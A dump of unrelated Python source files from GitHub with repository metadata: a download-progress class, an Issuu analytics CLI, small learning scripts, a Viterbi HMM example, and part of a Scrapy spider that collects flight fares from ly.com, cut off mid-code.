self.get_size_total() * 100:.1f}\"\n )\n except ZeroDivisionError:\n progress = 0\n return progress\n\n def get_id(self) -> int:\n \"\"\"Get the download id.\n\n Returns:\n ``int``: The download id.\n \"\"\"\n\n return self._id\n\n def get_url(self) -> str:\n \"\"\"Get the download URL.\n\n Returns:\n ``str``: The download URL.\n \"\"\"\n\n return self._url\n\n def get_status(self) -> str:\n \"\"\"Get the download status.\n\n Returns:\n ``str``: The download status.\n \"\"\"\n\n return self._status\n\n def 
get_retries(self) -> int:\n \"\"\"Get the download retries.\n\n Returns:\n ``int``: The download retries.\n \"\"\"\n\n return self._retries\n\n def get_attempts(self) -> int:\n \"\"\"Get the download attempts.\n\n Returns:\n ``int``: The download attempts.\n \"\"\"\n\n return self._attempts\n\n def get_file_path(self) -> str:\n \"\"\"Get the download location.\n\n Returns:\n ``str``: The download location.\n \"\"\"\n\n return self._path\n\n def get_file_name(self) -> str:\n \"\"\"Get the download file name.\n\n Returns:\n ``str``: The download file name.\n \"\"\"\n\n return self._name\n\n def get_start_time(\n self, human: bool = False, precise: bool = False\n ) -> Union[int, str]:\n time = self._start\n\n return self._human_precise(precise, human, time)\n\n def get_elapsed_time(\n self, human: bool = False, precise: bool = False\n ) -> Union[int, str]:\n \"\"\"Get the elapsed time bytes.\n\n Parameters:\n human (``bool``, *optional*):\n If True, it will return the bytes in a format for human understanding,\n if False, it will return only the bytes in numbers.\n\n precise (``bool``, *optional*):\n If True, it will return you want the precise time.\n if False, it will return only in human understanding format.\n ``human`` required.\n\n Raises:\n TypeError: In case of using precise mode without human mode.\n\n Returns:\n ``int``: If human mode is disabled.\n ``str``: If human mode is enabled.\n \"\"\"\n\n time = datetime.datetime.now() - self.get_start_time()\n\n return self._human_precise(precise, human, time)\n\n def get_speed(\n self, human: bool = False, binary: bool = False, gnu: bool = False\n ) -> Union[int, str]:\n \"\"\"Get the download speed bytes.\n\n Parameters:\n human (``bool``, *optional*):\n If True, it will return the bytes in a format for human understanding,\n if False, it will return only the bytes in numbers.\n\n binary (``bool``, *optional*):\n If True, it will return the bytes in a format for human understanding in binary mode,\n if False, it will return only in human understanding format.\n ``human`` required.\n\n gnu (``bool``, *optional*):\n If True, it will return the bytes in a format for human understanding in gnu mode,\n if False, it will return only in human understanding format.\n ``human`` required.\n\n Raises:\n TypeError: In case of using binary or gnu mode without human mode.\n TypeError: If you try to use binary and gnu mode at the same time.\n\n Returns:\n ``int``: If human mode is disabled.\n ``str``: If human mode is enabled.\n \"\"\"\n\n speed = self.get_size_downloaded() / (\n (datetime.datetime.now() - self._start).seconds + 1\n )\n\n return self._human_binary(binary, gnu, human, speed)\n\n def _human_binary(self, binary, gnu, human, arg3):\n if (binary or gnu) and not human:\n raise TypeError(\n \"For 'binary' or 'gnu' type you need to activate human size\"\n )\n if binary and gnu:\n raise TypeError(\n \"You can only choose one type, 'binary' or 'gnu' and not both at the same time\"\n )\n\n if human:\n return humanize.naturalsize(arg3, binary=binary, gnu=gnu)\n return arg3\n\n def get_eta(self, human: bool = False, precise: bool = False) -> Union[int, str]:\n \"\"\"Get the eta time bytes.\n\n Parameters:\n human (``bool``, *optional*):\n If True, it will return the bytes in a format for human understanding,\n if False, it will return only the bytes in numbers.\n\n precise (``bool``, *optional*):\n If True, it will return you want the precise time.\n if False, it will return only in human understanding format.\n ``human`` required.\n\n Raises:\n 
TypeError: In case of using precise mode without human mode.\n\n Returns:\n ``int``: If human mode is disabled.\n ``str``: If human mode is enabled.\n \"\"\"\n\n try:\n time = datetime.timedelta(\n seconds=(self.get_size_total() - self.get_size_downloaded())\n / self.get_speed()\n )\n except ZeroDivisionError:\n time = datetime.timedelta(seconds=0)\n\n return self._human_precise(precise, human, time)\n\n def _human_precise(self, precise, human, time):\n if precise and not human:\n raise TypeError(\"To get accurate time, activate human mode\")\n if human:\n if precise:\n return humanize.precisedelta(time)\n else:\n return humanize.naturaltime(time)\n return time\n\n def is_finished(self) -> bool:\n \"\"\"Checks whether the download has been completed.\n\n Returns:\n ``bool``: True if the download has been finished.\n \"\"\"\n\n return self.get_status() in [\"failed\", \"finished\", \"ready\", \"stopped\"]\n\n def is_success(self) -> bool:\n \"\"\"Checks whether the download was successful.\n\n Raises:\n :obj:`aiodown.errors.ProgressError`: If the download has not yet finished.\n\n Returns:\n ``bool``: True if the download was a success.\n \"\"\"\n\n if not self.is_finished():\n raise ProgressError()\n\n return self.get_status() == \"finished\"\n\n def __repr__(self) -> str:\n \"\"\"Get some download details.\n\n Returns:\n ``str``: Some download details.\n \"\"\"\n\n return f\"{self.__class__.__name__}(id={self.get_id()}, url={self.get_url()}, path={self.get_file_path()}, name={self.get_file_name()}, status={self.get_status()})\"\n\n def __str__(self) -> str:\n \"\"\"Get some download details.\n\n Returns:\n ``str``: Some download details.\n \"\"\"\n\n return self.__repr__()\n","repo_name":"AmanoTeam/aiodown","sub_path":"aiodown/types/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":17081,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70154655208","text":"# libraries imports\nimport argparse\nimport time\n\n# local imports\nfrom classes.exception.UnknownInputException import UnknownInputException\nfrom classes.ISSUU.IssuuFactory import IssuuFactory\n\nif __name__ == \"__main__\":\n\n # Construct the argument parser\n ap = argparse.ArgumentParser()\n\n # Add the arguments to the parser\n ap.add_argument(\"-u\", \"--user_uuid\",\n help=\"Input for the user UUID\")\n\n ap.add_argument(\"-d\", \"--doc_uuid\",\n help=\"Input for the document UUID\")\n\n ap.add_argument(\"-t\", \"--task_id\", required=True, choices=['2a', '2b', '3a', '3b', '4d', '5', '6'],\n help=\"\"\"\n Input for the task_id. 
Can take value in (2a, 2b, 3a, 3b, 4d, 5, 6) where:\n - 2a: Opens an horizontal bar chart of the count of document views by country\n - 2b: Opens an horizontal bar chart of the count of document views by continent\n - 3a: Opens an horizontal bar chart of the count of document views by browser with raw names\n - 3b: Opens an horizontal bar chart of the count of document views by browser with cleaned names\n - 4d: Generates an also-like list from the doc_id and user_id (optional)\n - 5: Generates an also-likes graph from the doc_id and user_id (optional)\n - 6: launches the GUI\n \n \"\"\")\n\n ap.add_argument(\"-f\", \"--filename\", required=True,\n help=\"Input for the name of the JSON file database\")\n \n args = vars(ap.parse_args()) \n\n print(\"Creating factory..\")\n f = IssuuFactory()\n print(\"Loading dataset..\")\n start = time.time()\n ds = f.load_dataset(path=args[\"filename\"])\n end = time.time()\n print(f\"Dataset of {ds.size()} elements loaded in {round(end - start, 4)} seconds..\")\n op = f.get_operator(ds)\n print(\"Operator loaded..\")\n\n if (args[\"task_id\"] == '2a'):\n if (args[\"doc_uuid\"] is not None):\n op.view_by_country(args[\"doc_uuid\"])\n else:\n print(\"Document ID parameter missing.. Interrupting execution\")\n elif (args[\"task_id\"] == '2b'):\n if (args[\"doc_uuid\"] is not None):\n op.view_by_continent(args[\"doc_uuid\"])\n else:\n print(\"Document ID parameter missing.. Interrupting execution\")\n elif (args['task_id'] == '3a'):\n op.view_by_browser()\n elif (args[\"task_id\"] == \"3b\"):\n op.view_by_browser(simplified=True)\n elif (args[\"task_id\"] == \"4d\"):\n if (args[\"doc_uuid\"] is not None):\n print(op.also_likes(args[\"doc_uuid\"], args[\"user_uuid\"], plot=False))\n else:\n print(\"Document ID parameter missing.. Interrupting execution\")\n elif (args[\"task_id\"] == \"5\"):\n if (args[\"doc_uuid\"] is not None):\n op.also_likes(args[\"doc_uuid\"], args[\"user_uuid\"], plot=True)\n else:\n print(\"Document ID parameter missing.. 
Interrupting execution\")\n elif (args[\"task_id\"] == \"6\"):\n gui = f.launch_GUI(op, args[\"doc_uuid\"], args[\"user_uuid\"])\n print(\"Loading gui..\")\n gui.show()\n else:\n raise UnknownInputException()","repo_name":"dimartinot/Data-Analysis-of-a-document-tracker","sub_path":"cw2.py","file_name":"cw2.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37983253244","text":"# for element in range(1,21):\n# print(element)\n\n\n# lista =[1,2,4,5,6,7]\n\n# for element in lista:\n# print(element)\n\nproducto = {\n \"nombre\" :\"camisa\",\n \"precio\" : 100,\n \"stock\" : 20\n} \n\nprint(producto)\n\n# for key in producto:\n# print(key, \"=>\", producto[key])\n\nfor key, value in producto.items():\n print(key, '=>', value)","repo_name":"jbenavidesnati05/python-sab-cesde","sub_path":"for.py","file_name":"for.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25380014092","text":"import unittest\n\nfrom stactools.aerial import stac\nfrom tests import test_data\n\n\nclass StacTest(unittest.TestCase):\n\n def test_create_collection(self):\n collection = stac.create_collection()\n collection.set_self_href(\"\")\n\n self.assertEqual(collection.id, \"test-aerial-imagery\")\n self.assertEqual(collection.extent.spatial.to_dict()[\"bbox\"],\n [[-180., 90., 180., -90.]])\n\n collection.validate()\n\n def test_create_item(self):\n path = test_data.get_external_data(\"EO_20190308.1618_11.tif\")\n item = stac.create_item(path)\n\n self.assertEqual(item.id, \"EO_20190308.1618_11\")\n\n item.validate()\n","repo_name":"pjhartzell/aerial","sub_path":"tests/test_stac.py","file_name":"test_stac.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24166670798","text":"\nfrom pyspark import SparkContext, SparkConf\n\nsc = SparkContext()\n\nlines = sc.textFile(\"/tmp/word_count.txt\")\nline = lines.flatMap(lambda s: s.split(\" \")).map(lambda s: (s,1)).reduceByKey(lambda a, b: a+b)\n\nprint(line.collect())\nline.saveAsTextFile(\"/tmp/word\")","repo_name":"SunilKumarGarg/Spark","sub_path":"python/wordCount.py","file_name":"wordCount.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20765074294","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Oct 21 08:27:28 2019\r\n\r\n@author: Labmirp\r\n\"\"\"\r\nsqn=('GGCACTGAA')\r\nestados = ('H', 'L')\r\nprobInicio = {'H': 0.5, 'L': 0.5}\r\nprobTrans = {'H' : {'H': 0.5, 'L': 0.5}, 'L' : {'H': 0.4, 'L': 0.6}}\r\nprobEmision = {'H' : {'A': 0.2, 'C': 0.3, 'G': 0.3, 'T':0.2}, \r\n 'L' : {'A': 0.3, 'C': 0.2, 'G': 0.2, 'T':0.3}}\r\n\r\nif len(sqn)!=0:\r\n res = [{}]\r\n # Probabilidades de Inicio\r\n for e in estados:\r\n probabilidad=probInicio[e] * probEmision[e][sqn[0]] \r\n estadoPrevio=None\r\n res[0][e] = {\"prob\":probabilidad , \"prev\": estadoPrevio}\r\n # Probabilidades Después del Inicio\r\n for i in range(1, len(sqn)):\r\n res.append({})\r\n for e in estados:\r\n \r\n ProbEstadoH=res[i-1][estados[0]][\"prob\"]*probTrans[estados[0]][e]\r\n ProbEstadoL=res[i-1][estados[1]][\"prob\"]*probTrans[estados[1]][e]\r\n \r\n if ProbEstadoH>ProbEstadoL:\r\n maxProbTrans=ProbEstadoH\r\n prev_e='H'\r\n else:\r\n maxProbTrans=ProbEstadoL\r\n prev_e='L'\r\n \r\n prob 
= maxProbTrans * probEmision[e][sqn[i]]\r\n res[i][e] = {\"prob\": prob, \"prev\": prev_e}\r\n # Encontrar Máxima Probabilidad\r\n maxProb=0\r\n for e in estados:\r\n current_p=res[-1][e][\"prob\"]\r\n if current_p>maxProb:\r\n prev_e=e\r\n maxProb=current_p;\r\n # Encontrar la Ruta \r\n out=[]\r\n for i in range(len(res) - 2, -1, -1):\r\n out.insert(0, res[i + 1][prev_e][\"prev\"])\r\n previous = res[i + 1][prev_e][\"prev\"]\r\n\r\n print('La ruta más probable es: ')\r\n for o in out:\r\n print(o+\" \",end=\"\")\r\n print(\"\") \r\n print('Con una probabilidad de: '+str(maxProb)) \r\n \r\n \r\n\r\n \r\nelse:\r\n print('La secuencia eeá vacía')\r\n \r\n","repo_name":"rfrancoce/LD_HMM","sub_path":"HMM/Viterbi.py","file_name":"Viterbi.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14597692511","text":"# -*- coding: utf-8 -*-\r\n# 爬取艺龙网机票信息\r\nimport datetime\r\nimport json\r\nimport os\r\nimport sys\r\nimport time\r\nimport traceback\r\n\r\nimport random\r\nimport pytz\r\nimport scrapy\r\nimport httpx\r\nfrom httpx._config import SSLConfig\r\nfrom flight_spider.ylutils.excel_read import get_airport, get_full_airport, get_city_from_airport\r\nfrom flight_spider.ylutils.ylLog import YlLog\r\nfrom flight_spider.ylutils.ylFile import YlFile\r\nfrom flight_spider.redisUtil import RedisUtil\r\nfrom flight_spider.settings import user_agent_mobile\r\nfrom flight_spider.YlSpiderItem import YlSpiderItem, YlBatchItem\r\nimport urllib.parse as up\r\nfrom flight_spider.ylutils.ip_map import ip_map\r\nimport csv\r\nfrom collections import defaultdict\r\n\r\n\r\nclass YlSpider06(scrapy.Spider):\r\n name = 'ylSpider06'\r\n allowed_domains = ['www.ly.com']\r\n start_urls = ['https://www.ly.com/']\r\n\r\n # redis_key = 'yl:start_urls'\r\n\r\n def __init__(self, *args, **kwargs):\r\n super().__init__(*args, **kwargs)\r\n scrapy.Spider.__init__(self, self.name)\r\n self.file_name = kwargs.get('file_name')\r\n self.from_line = kwargs.get('from_line')\r\n self.to_line = kwargs.get('to_line')\r\n self.from_date = kwargs.get('from_date')\r\n self.to_date = kwargs.get('to_date')\r\n self.is_low_price = kwargs.get('is_low_price')\r\n self.task_time = datetime.datetime.strftime(datetime.datetime.now(), \"%Y-%m-%d %H:00:00\")\r\n # self.task_time = kwargs.get('task_time') + '0'\r\n # 当前时间\r\n self.now_date = datetime.datetime.strftime(datetime.datetime.now(), \"%Y-%m-%d\")\r\n self.ylLog = YlLog()\r\n self.ylFile = YlFile(os.path.abspath('.'))\r\n self.redisUtil = RedisUtil()\r\n self.start_time = None\r\n self.end_time = None\r\n self.success, self.total, self.fail, self.count, self.exception, self.success_lowest = 0, 0, 0, 0, 0, 0\r\n print(self.file_name, self.from_line, self.to_line, self.from_date, self.to_date, self.is_low_price,\r\n self.task_time)\r\n self.base_path = os.path.abspath('.')\r\n # 一市两场\r\n self.airport_map = {\r\n \"PEK\": \"PEK\",\r\n \"PKX\": \"PEK\",\r\n \"PVG\": \"PVG\",\r\n \"SHA\": \"PVG\",\r\n \"CTU\": \"CTU\",\r\n \"TFU\": \"CTU\",\r\n \"ZYI\": \"ZYI\",\r\n \"WMT\": \"WMT\",\r\n }\r\n # 一市两场三字码\r\n self.air_list = [\"PEK\", \"PKX\", \"PVG\", \"SHA\", \"CTU\", \"TFU\", \"ZYI\", \"WMT\"]\r\n self.flight_infos = {}\r\n\r\n @property\r\n def get_seconds(self) -> int:\r\n datetime_object = datetime.datetime.now()\r\n now_timetuple = datetime_object.timetuple()\r\n now_second = time.mktime(now_timetuple)\r\n mow_millisecond = int(now_second * 1000 + datetime_object.microsecond / 1000)\r\n 
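The Viterbi record above hard-codes the two states and, in its backtrace loop, assigns `previous` but keeps indexing with `prev_e`, so the reconstructed path never actually walks backwards. A hedged, self-contained sketch that generalizes the same dynamic program to any number of states and threads the backpointer correctly (same toy H/L model and sequence as the record):

```python
def viterbi(obs, states, start_p, trans_p, emit_p):
    """Most likely state path for an observation sequence (sketch)."""
    # V[t][s] = (best probability of ending in s at time t, best predecessor)
    V = [{s: (start_p[s] * emit_p[s][obs[0]], None) for s in states}]
    for t in range(1, len(obs)):
        V.append({})
        for s in states:
            prob, prev = max(
                (V[t - 1][p][0] * trans_p[p][s] * emit_p[s][obs[t]], p)
                for p in states
            )
            V[t][s] = (prob, prev)
    # Backtrace from the most probable final state.
    prob, last = max((V[-1][s][0], s) for s in states)
    path = [last]
    for t in range(len(obs) - 1, 0, -1):
        path.insert(0, V[t][path[0]][1])
    return path, prob

states = ("H", "L")
start_p = {"H": 0.5, "L": 0.5}
trans_p = {"H": {"H": 0.5, "L": 0.5}, "L": {"H": 0.4, "L": 0.6}}
emit_p = {"H": {"A": 0.2, "C": 0.3, "G": 0.3, "T": 0.2},
          "L": {"A": 0.3, "C": 0.2, "G": 0.2, "T": 0.3}}
print(viterbi("GGCACTGAA", states, start_p, trans_p, emit_p))
```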
return mow_millisecond\r\n\r\n # 判断字典中父节点是否有子节点\r\n def has_node(self, data: dict, node: str):\r\n for k, v in data.items():\r\n if node == k:\r\n return True\r\n else:\r\n continue\r\n return False\r\n\r\n def switch_ele(self, collection: list, index1: int, index2: int):\r\n mid = collection[index1]\r\n collection[index1] = collection[index2]\r\n collection[index2] = mid\r\n\r\n def get_headers_2(self, gnjpapphead, ua, link_tracker_id, session_id, cookies):\r\n headers = {\r\n \"Host\": \"m.ly.com\",\r\n \"Connection\": \"keep-alive\",\r\n \"Content-Type\": \"application/json\",\r\n \"tcplat\": str(gnjpapphead['tcplat']),\r\n \"Origin\": \"https://m.ly.com\",\r\n \"auth\": \"true\",\r\n \"User-Agent\": ua,\r\n \"tcversion\": str(gnjpapphead['tcversion']),\r\n \"tcuserid\": \"\",\r\n \"Accept\": \"application/json, text/plain, */*\",\r\n \"tcopenid\": \"\",\r\n # \"cache-control\": \"no-cache\",\r\n \"tctracerid\": link_tracker_id,\r\n \"tcbusiness\": \"true\",\r\n \"tcsectoken\": \"\",\r\n \"tcsessionid\": session_id,\r\n \"Referer\": \"\",\r\n \"Accept-Encoding\": \"gzip, deflate, br\",\r\n \"Accept-Language\": \"zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6\",\r\n \"Cookie\": cookies,\r\n }\r\n return headers\r\n\r\n def get_headers_1(self, tcp_plat, ua, tcversion, tctracer_id, server_session_id, cookies):\r\n headers = {\r\n \"Host\": \"m.ly.com\",\r\n \"Connection\": \"keep-alive\",\r\n \"Content-Type\": \"application/json\",\r\n \"tcplat\": str(tcp_plat),\r\n \"Origin\": \"https://m.ly.com\",\r\n \"auth\": \"true\",\r\n \"User-Agent\": ua,\r\n \"tcversion\": tcversion,\r\n \"tcuserid\": \"\",\r\n \"Accept\": \"application/json, text/plain, */*\",\r\n \"tcopenid\": \"\",\r\n # \"cache-control\": \"no-cache\",\r\n \"tctracerid\": tctracer_id,\r\n \"tcbusiness\": \"true\",\r\n \"tcsectoken\": \"\",\r\n \"tcsessionid\": server_session_id,\r\n \"Referer\": \"\",\r\n \"Accept-Encoding\": \"gzip, deflate, br\",\r\n \"Accept-Language\": \"zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6\",\r\n \"Cookie\": cookies,\r\n }\r\n return headers\r\n\r\n def get_default_headers(self, url):\r\n headers = {\r\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\r\n \"Accept-Encoding\": \"gzip, deflate, br\",\r\n \"Accept-Language\": \"zh-CN,zh;q=0.9\",\r\n \"Cache-Control\": \"max-age=0\",\r\n \"Connection\": \"keep-alive\",\r\n \"Host\": url.split(\"://\")[-1].replace(\"/\", \"\"),\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36\",\r\n }\r\n return headers\r\n\r\n '''\r\n @Description: 冒泡排序,加入flag判断数组是否有序\r\n '''\r\n\r\n def bubble_sort(self, collection: list):\r\n flags = 0\r\n for i, economy_cabin in enumerate(collection):\r\n for j in range(0, len(collection) - 1 - i):\r\n # 遍历,将价格最小的对象排在列表第一个(冒泡)\r\n if int(collection[i]['SellPrice']) > int(collection[i + 1]['SellPrice']):\r\n self.switch_ele(collection, j, j + 1)\r\n # 不是有序的,flags设置为1\r\n flags = 1\r\n elif flags == 0:\r\n return\r\n else:\r\n continue\r\n\r\n # 从cookie中取得请求体需要的参数\r\n def get_cookie_params(self, cookies: str):\r\n global session_id, link_tracker_id, gnjpapphead\r\n _cookies = cookies.split(\";\")\r\n for coo in _cookies:\r\n key = coo.split(\"=\")[0].strip()\r\n value = coo.split(\"=\")[1].strip()\r\n if key.__eq__(\"serverSessionId\"):\r\n session_id = value\r\n elif key.__eq__(\"traceid\"):\r\n link_tracker_id = value\r\n elif 
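The `bubble_sort` helper above compares `collection[i]` and `collection[i + 1]` while swapping at `j`/`j + 1`, and its `elif flags == 0: return` bails out on the first non-swapping comparison, so it can both index past the end of the list and return an unsorted list (the record itself later sidesteps it by calling `list.sort`). A corrected sketch of the intended early-exit bubble sort:

```python
def bubble_sort(collection: list) -> None:
    """Sort fare dicts in place by ascending SellPrice (corrected sketch)."""
    n = len(collection)
    for i in range(n):
        swapped = False
        for j in range(0, n - 1 - i):
            if int(collection[j]["SellPrice"]) > int(collection[j + 1]["SellPrice"]):
                collection[j], collection[j + 1] = collection[j + 1], collection[j]
                swapped = True
        if not swapped:
            return  # a full pass with no swaps: the list is already sorted
```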
key.__eq__(\"gnjpapphead\"):\r\n gnjpapphead = eval(up.unquote(value))\r\n return session_id, link_tracker_id, gnjpapphead\r\n\r\n '''\r\n @Description: 读取传参,开启请求\r\n '''\r\n\r\n def start_requests(self):\r\n # 初始化变量\r\n global cookies, gnjpapp_head, server_session_id\r\n self.start_time = time.time()\r\n gnjpapp_head = None\r\n server_session_id = \"\"\r\n cookies = \"\"\r\n list = []\r\n with open(f\"{self.file_name}\", \"r\", encoding='utf-8') as f:\r\n for line in f:\r\n line = line.strip()\r\n line = eval(line)\r\n list.append(line)\r\n\r\n if int(self.from_line) == -1 or int(self.to_line) == -1:\r\n file_line = list\r\n else:\r\n file_line = list[(int(self.from_line) - 1):int(self.to_line)]\r\n\r\n for i, li in enumerate(file_line):\r\n from_city = li['from_city_name']\r\n to_city = li['to_city_name']\r\n from_city_code = li['from_city_code']\r\n to_city_code = li['to_city_code']\r\n # 北京地区做特殊处理\r\n _to_city_code = \"BJS\" if to_city.__eq__(\"北京\") else to_city_code\r\n _from_city_code = \"BJS\" if from_city.__eq__(\"北京\") else from_city_code\r\n # 重庆武隆做特殊处理\r\n from_city = \"重庆\" if from_city.__eq__(\"武隆\") else from_city\r\n to_city = \"重庆\" if to_city.__eq__(\"武隆\") else to_city\r\n now_time = time.strftime(\"%F\")\r\n if int(self.from_date) == 0 and int(self.to_date) == 0:\r\n days = [0]\r\n elif int(self.from_date) == -1 or int(self.to_date) == -1:\r\n days = range(15)\r\n else:\r\n days = range(int(self.from_date), (int(self.to_date) + 1))\r\n for j in days:\r\n\r\n flight_time = (datetime.datetime.strptime(now_time, \"%Y-%m-%d\") + datetime.timedelta(days=j)).strftime(\r\n \"%Y-%m-%d\")\r\n print(f\"***{flight_time}***\")\r\n _flight_time = datetime.datetime.strptime(flight_time, \"%Y-%m-%d\")\r\n ua = random.choice(user_agent_mobile)\r\n create_time = datetime.datetime.now(pytz.timezone('Asia/Shanghai')).strftime(\r\n '%Y-%m-%d %H:%M:%S')\r\n metadata = {\"from_city\": from_city, \"to_city\": to_city, \"from_city_code\": _from_city_code,\r\n \"to_city_code\": _to_city_code, \"index\": int(i + 1), \"flight_time\": flight_time,\r\n 'is_low_price': 0 if self.is_low_price == '0' else 1, 'dont_merge_cookies': True,\r\n 'create_time': create_time, 'user-agent': ua}\r\n # redis中是否已保存cookie\r\n if self.redisUtil.hash_exist_key(f\"ly:{self.now_date}-cookie\", \"cookies\"):\r\n cookies = str(self.redisUtil.get(f\"ly:{self.now_date}-cookie\", \"cookies\"), \"utf-8\")\r\n server_session_id, link_tracker_id, gnjpapp_head = self.get_cookie_params(cookies)\r\n tctracer_id = gnjpapp_head.get('tctracerid')\r\n tcp_plat = int(gnjpapp_head.get('tcplat'))\r\n current_milli_time = self.get_seconds\r\n server_session_id = f\"0-{current_milli_time}\" if server_session_id == \"\" else server_session_id\r\n tcversion = gnjpapp_head.get('tcversion')\r\n _from_city, _to_city = up.quote(from_city), up.quote(to_city)\r\n url = f\"https://m.ly.com/touchbook/touch/sbook1/{from_city_code}/{to_city_code}/{_from_city}/{_to_city}/{flight_time}?fromcitycode={_from_city_code}&tocitycode={_to_city_code}&childticket=0,0&fromairport=&toairport={to_city_code}&cabin=0&hasAirPort=3&RefId=10758821&bd_vid=\"\r\n headers = self.get_headers_1(tcp_plat, ua, tcversion, tctracer_id, server_session_id, cookies)\r\n headers['Referer'] = url\r\n # 获取sd\r\n sd_delta = datetime.timedelta(days=3)\r\n sd_date = _flight_time - sd_delta\r\n sd = sd_date.strftime(\"%Y-%m-%d\")\r\n # 获取ed\r\n ed_delta = datetime.timedelta(days=15)\r\n ed_date = _flight_time + ed_delta\r\n ed = ed_date.strftime(\"%Y-%m-%d\")\r\n form_data = {\r\n 
\"IsMuilteSite\": 1, \"aac\": \"\", \"acc\": _to_city_code, \"cabin\": 0, \"dac\": \"\",\r\n \"dcc\": _from_city_code,\r\n \"ddate\": flight_time, \"entrance\": 0,\r\n \"pc\": {\r\n \"sd\": sd,\r\n \"ed\": ed,\r\n },\r\n \"plat\": int(tcp_plat),\r\n \"pt\": 0\r\n }\r\n metadata['headers'], metadata['form_data'] = headers, form_data\r\n yield scrapy.FormRequest(\r\n url=\"https://m.ly.com/touchbook/flightApis/wx/flightquery/flights\",\r\n body=json.dumps(form_data).encode(\"utf-8\"), method=\"POST\",\r\n callback=self.parse_api, dont_filter=True, meta=metadata, headers=headers)\r\n else:\r\n self.ylLog.debug(\"cookie过期或者不存在\")\r\n sys.exit()\r\n\r\n '''\r\n @Description: 需要解析退改价格、托运行李额等数据,所以每个航班都需要callback到parse_lowest_price函数\r\n '''\r\n\r\n def parse_api(self, response):\r\n self.total += 1\r\n self.ylLog.info(f\"采集总次数:{self.total}\")\r\n print(\"res\", response)\r\n global cookies, gnjpapp_head, server_session_id\r\n gnjpapp_head, server_session_id, cookies = None, \"\", \"\"\r\n from_city = response.meta['from_city']\r\n to_city = response.meta['to_city']\r\n from_city_code = response.meta['from_city_code']\r\n to_city_code = response.meta['to_city_code']\r\n flight_time = response.meta['flight_time']\r\n _flight_time = datetime.datetime.strptime(flight_time, \"%Y-%m-%d\")\r\n userAgent = response.meta['user-agent']\r\n create_time = response.meta['create_time']\r\n headers = response.meta['headers']\r\n form_data = response.meta['form_data']\r\n # 北京地区做特殊处理\r\n _to_city_code = \"BJS\" if to_city.__eq__(\"北京\") else to_city_code\r\n _from_city_code = \"BJS\" if from_city.__eq__(\"北京\") else from_city_code\r\n # 重庆武隆做特殊处理\r\n from_city = \"重庆\" if from_city.__eq__(\"武隆\") else from_city\r\n to_city = \"重庆\" if to_city.__eq__(\"武隆\") else to_city\r\n if response.url == \"**\":\r\n self.fail += 1\r\n msg = f\"响应异常,OD为:{from_city}:{from_city_code}={to_city}:{to_city_code}>>>次数:{self.fail}\\n\"\r\n self.ylLog.exception(f\"{msg}\")\r\n if response.status in [200, 201]:\r\n self.count += 1\r\n self.ylLog.info(f\"成功返回页面>>>{self.count}\")\r\n self.ylLog.info(\"响应成功率: %4f\" % (self.count / self.total))\r\n try:\r\n data = json.loads(response.body.decode())\r\n # 判断当日是否有航班\r\n if self.has_node(data.get('body'), \"fpc\"):\r\n data_list = []\r\n flights = data['body']['fpc']\r\n count = 0\r\n for k, v in flights.items():\r\n if len(v) == 0:\r\n continue\r\n else:\r\n for flight in v:\r\n # 获取PhoenixRuleId\r\n phoenix_rule_id = str(flight['newLps']['PhoenixRuleId'])\r\n icsf = flight['icsf']\r\n # 通过icsf判断是否是共享航班,并且不是产品\r\n if not icsf:\r\n print(f\"phoenix_rule_id>>> {phoenix_rule_id}\")\r\n flight_transfer, flight_type, platform = \"\", \"\", \"yl\"\r\n # 需要退改价格等数据,需要请求每个航班详情数据\r\n count += 1\r\n start_time = flight['dt'].split(\" \")[1]\r\n end_time = flight['at'].split(\" \")[1]\r\n plane_no = flight['fn']\r\n company = flight['asn']\r\n _from_city_code = flight['dac']\r\n _to_city_code = flight['aac']\r\n from_airport_name = flight['dasn']\r\n to_airport_name = flight['aasn']\r\n _from_city = get_city_from_airport(\r\n str(from_airport_name),\r\n self.base_path) if _from_city_code == \"CQW\" else from_city\r\n _to_city = get_city_from_airport(\r\n str(to_airport_name),\r\n self.base_path) if _to_city_code == \"CQW\" else to_city\r\n from_city_airport = get_full_airport(_from_city_code, self.base_path)\r\n to_city_airport = get_full_airport(_to_city_code, self.base_path)\r\n print(\r\n f\"<<>>\")\r\n headers[\r\n 'Referer'] = 
